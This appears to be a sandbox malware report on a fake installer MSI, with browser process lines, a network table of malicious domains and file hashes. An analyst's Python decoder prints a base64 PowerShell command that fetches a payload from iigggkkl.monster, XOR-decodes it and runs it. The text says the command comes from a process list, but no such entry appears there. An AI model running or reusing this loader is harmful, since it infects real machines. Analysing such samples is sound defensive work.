"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5824 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6108 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5416 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6472 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6476 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6084 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2288 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3064 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3268 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4768 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3892 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4420 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5140 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5180 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5536 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5528 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5560 --field-trial-handle=2292,i,11360901354776073152,7361876610395286065,262144 --variations-seed-version /prefetch:1
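One of the powershell.exe entries in the process list above carries its full encoded command (-e). The Python below is an added analyst example, not part of the sandbox report: it decodes that argument exactly as copied from the page, pulls the loader's parameters out of the decoded text (the download URL, the character substitution it undoes before base64-decoding, and the two XOR constants), and replays the same transform on a constructed stand-in for the second stage so the result can be checked without running anything. The real content served as newdrop.bs64 is not on the page and is not fetched here; the sample payload and the encode_like_loader helper exist only to build offline test input.

```python
import base64
import re
from functools import reduce

# The -e argument of the powershell.exe command line recorded in the behavioral1
# process list above, copied verbatim from the page.
ENCODED_CMD = "JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA="


def decode_encoded_command(b64: str) -> str:
    """powershell.exe -e takes base64 of a UTF-16LE string, so decode it that way
    (a plain UTF-8 decode yields text with a NUL after every character)."""
    return base64.b64decode(b64).decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pull the loader's parameters out of the decoded text: the download URL,
    the .Replace() substitution table, and the XOR constants collapsed to one key."""
    url = re.search(r"""https?://[^\s"')]+""", script)
    subst = dict(re.findall(r'\.Replace\("(.)","(.)"\)', script))
    xor_keys = [int(k) for k in re.findall(r"-bxor\s+(\d+)", script)]
    return {
        "url": url.group(0) if url else None,
        "subst": subst,  # symbol in the served file -> base64 letter it stands for
        # XOR with 167 and then with 18 is a single XOR with 167 ^ 18 for every byte
        "xor_key": reduce(lambda a, b: a ^ b, xor_keys, 0),
    }


def recover_stage2(served_text: str, params: dict) -> bytes:
    """Replay the loader's transform offline (undo substitution, base64-decode,
    XOR): the bytes iex would have executed, obtained without executing them."""
    fixed = served_text
    for sym, letter in params["subst"].items():
        fixed = fixed.replace(sym, letter)
    return bytes(b ^ params["xor_key"] for b in base64.b64decode(fixed))


def encode_like_loader(plain: bytes, params: dict) -> str:
    """Inverse transform. Constructed here only to build offline test input; the
    real newdrop.bs64 content is not on the page and is not fetched."""
    b64 = base64.b64encode(bytes(b ^ params["xor_key"] for b in plain)).decode()
    for sym, letter in params["subst"].items():
        b64 = b64.replace(letter, sym)
    return b64


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED_CMD)
    params = extract_iocs(script)
    print(script)
    print(params)
    # Round-trip a constructed stage-two payload through the recovered parameters.
    sample = b'Write-Host "constructed stage-two payload"'
    assert recover_stage2(encode_like_loader(sample, params), params) == sample
```

Decoding shows why this layer is cheap to strip: -e is base64 of UTF-16LE text, so decode as UTF-16LE rather than UTF-8; the five Replace() calls mean the served file has the base64 letters b, h, m, p and v swapped for punctuation, so it does not look like base64 to a carver until the table is applied; and the two XORs are one XOR with 181. The URL ties this command to the iigggkkl.monster row (188.114.97.2:443) in the Network table. Recover the second stage with recover_stage2 on a captured copy of the served file rather than by letting iex run it.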

Network

Country Destination Domain Proto
US 8.8.8.8:53 21.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 thecurl.monster udp
US 172.67.176.123:80 thecurl.monster tcp
US 172.67.176.123:443 thecurl.monster tcp
US 8.8.8.8:53 123.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
US 8.8.8.8:53 174.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 the.earth.li udp
US 8.8.8.8:53 iigggkkl.monster udp
US 188.114.97.2:443 iigggkkl.monster tcp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 124.131.93.93.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
US 8.8.8.8:53 134.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 checkass.monster udp
US 104.21.2.229:443 checkass.monster tcp
US 8.8.8.8:53 229.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
GB 142.250.180.3:443 update.googleapis.com tcp
US 13.107.6.158:443 business.bing.com tcp
GB 142.250.180.3:443 update.googleapis.com tcp
US 13.107.6.158:443 business.bing.com tcp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 2.17.5.133:443 www.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.11.108.188:443 nav-edge.smartscreen.microsoft.com tcp
GB 2.17.5.133:443 www.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
FR 13.105.221.27:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 88.221.135.81:443 bzib.nelreports.net tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 27.221.105.13.in-addr.arpa udp
US 8.8.8.8:53 81.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 133.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
GB 92.123.128.155:443 www.bing.com tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 155.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 jspm.dev udp
US 8.8.8.8:53 jspm.dev udp
US 205.234.175.175:443 jspm.dev tcp
US 205.234.175.175:443 jspm.dev tcp
US 8.8.8.8:53 175.175.234.205.in-addr.arpa udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 104.17.138.37:443 blockchain.info tcp
US 8.8.8.8:53 37.138.17.104.in-addr.arpa udp
US 8.8.8.8:53 dark-confusion.com udp
US 8.8.8.8:53 dark-confusion.com udp
US 188.114.96.2:443 dark-confusion.com tcp
US 188.114.96.2:443 dark-confusion.com tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 188.114.96.2:443 dark-confusion.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 92.123.128.155:443 www.bing.com tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 edgestatic.azureedge.net udp
FR 13.105.221.27:443 edgestatic.azureedge.net tcp
FR 13.105.221.27:443 edgestatic.azureedge.net tcp
FR 13.105.221.27:443 edgestatic.azureedge.net tcp
GB 92.123.128.184:443 www.bing.com tcp
US 8.8.8.8:53 184.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.128.184:443 www.bing.com udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
GB 2.17.5.133:443 www.microsoft.com tcp
GB 92.123.128.152:443 www.bing.com udp
US 8.8.8.8:53 152.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.17.5.133:443 www.microsoft.com tcp
GB 92.123.128.152:443 www.bing.com udp
US 172.67.151.174:80 death1488.com tcp
GB 93.93.131.124:443 the.earth.li tcp
US 172.67.151.174:80 death1488.com tcp
US 188.114.97.2:443 dark-confusion.com tcp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
GB 2.17.5.133:443 www.microsoft.com tcp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
GB 93.93.131.124:443 the.earth.li tcp
GB 93.93.131.124:443 the.earth.li tcp
US 172.67.151.174:80 death1488.com tcp
US 104.21.68.134:80 raur94.com tcp
US 8.8.8.8:53 iigggkkl.monster udp
US 104.21.68.134:443 raur94.com tcp
US 188.114.97.2:443 iigggkkl.monster tcp
US 104.21.68.134:80 raur94.com tcp
US 188.114.97.2:443 iigggkkl.monster tcp
US 104.21.68.134:443 raur94.com tcp
GB 93.93.131.124:443 the.earth.li tcp
US 104.21.68.134:80 raur94.com tcp
US 188.114.97.2:443 iigggkkl.monster tcp
US 104.21.68.134:443 raur94.com tcp
US 104.21.2.229:443 checkass.monster tcp
NL 89.105.201.188:80 89.105.201.188 tcp
US 8.8.8.8:53 188.201.105.89.in-addr.arpa udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.69.165.172.in-addr.arpa udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 92.123.128.178:443 www.bing.com udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 178.128.123.92.in-addr.arpa udp
GB 88.221.134.17:443 bzib.nelreports.net tcp
US 8.8.8.8:53 17.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 104.17.139.37:443 blockchain.info tcp
US 8.8.8.8:53 37.139.17.104.in-addr.arpa udp
US 8.8.8.8:53 dark-confusion.com udp
US 8.8.8.8:53 dark-confusion.com udp
US 188.114.97.2:443 dark-confusion.com udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.21:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 21.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 8.8.8.8:53 blockchain.info udp
US 104.17.141.37:443 blockchain.info tcp
US 8.8.8.8:53 dark-confusion.com udp
US 8.8.8.8:53 dark-confusion.com udp
US 172.67.158.229:443 dark-confusion.com udp
US 8.8.8.8:53 37.141.17.104.in-addr.arpa udp
US 8.8.8.8:53 229.158.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp

Files

C:\Users\Admin\Desktop\x32_x64_installer\setup.zip

MD5 7c58506247a0c7c5554caddff4cbaa79
SHA1 6597d983d2bc026c04d4c5232a1a7ae2f3d4ffc2
SHA256 9e392ff42eef2346a683c2896b5346a1769bc7c2c625a60c677613afe8adb323
SHA512 4496a908877099ab9c9e7cb79b82ba1eba34128d816a242d9567d860893e05aaae0b8accb8d7a8adb0c58fab9a7c4a14357225cbddbdde827d1ac574f10cce4b

C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi

MD5 2a612d600e5370ebccb620fdd087eaa4
SHA1 264aa1436f653370ed3b99072f377c8904c68bcc
SHA256 cf76109c76aba7474de8b50e4adabe2790a172a65994a5d7ac66bcc406e1e148
SHA512 dd6db901c971cfe6459a8588873114f6031793a62cce9c1644b7aa9b14d21dd2c30ac02cf6969846fbabf6f2e99e85f03f8e8db3407c90722b851cdc0f22a1c2

C:\Windows\Installer\MSID622.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSIEDF5.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/224-62-0x0000000072FD0000-0x0000000073780000-memory.dmp

memory/224-63-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/224-64-0x0000000002C60000-0x0000000002C96000-memory.dmp

memory/224-65-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/224-66-0x0000000005450000-0x0000000005A78000-memory.dmp

memory/224-67-0x0000000005420000-0x0000000005442000-memory.dmp

memory/224-68-0x0000000005C20000-0x0000000005C86000-memory.dmp

memory/224-69-0x0000000005C90000-0x0000000005CF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_romj4si1.yj4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/224-75-0x0000000005D00000-0x0000000006054000-memory.dmp

memory/224-80-0x0000000006300000-0x000000000631E000-memory.dmp

memory/224-81-0x0000000006390000-0x00000000063DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/224-83-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/224-84-0x00000000079E0000-0x000000000805A000-memory.dmp

memory/224-85-0x00000000067A0000-0x00000000067BA000-memory.dmp

memory/224-86-0x0000000007360000-0x00000000073F6000-memory.dmp

memory/224-87-0x0000000006850000-0x0000000006872000-memory.dmp

